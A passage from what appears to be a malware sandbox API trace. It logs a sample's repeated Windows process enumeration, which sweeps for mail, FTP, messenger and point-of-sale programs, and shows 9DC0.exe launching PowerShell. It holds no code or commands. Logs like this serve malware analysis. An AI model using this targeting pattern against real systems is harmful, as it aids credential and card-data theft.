hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0188.913] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0188.915] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0188.917] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0188.921] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0188.923] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0188.972] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0188.975] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0188.978] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0188.981] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0188.983] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0188.986] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0188.990] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0188.993] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0188.995] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0188.998] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0189.001] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0189.003] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0189.005] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0189.072] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0189.075] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0189.077] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0189.078] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0189.081] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0189.083] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0189.085] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0189.086] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0189.088] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0189.090] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0189.092] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0189.094] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0189.096] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0189.098] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0189.100] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0189.102] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.106] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0189.114] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0189.149] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.151] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.153] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0189.155] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0189.156] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0189.158] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0189.159] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0189.161] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.163] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0189.164] CloseHandle (hObject=0x17ec) returned 1 [0189.164] Sleep (dwMilliseconds=0x64) [0189.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0189.210] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.211] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.213] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.214] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.215] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.257] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.258] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.262] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.264] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.265] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.267] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.268] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.270] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.272] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.273] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.275] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.276] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.278] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.280] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.281] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.283] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.286] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.287] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0189.289] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.290] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0189.292] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0189.293] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0189.371] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0189.373] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0189.375] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.378] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.380] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0189.382] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.384] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0189.385] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.387] Process32Next (in: 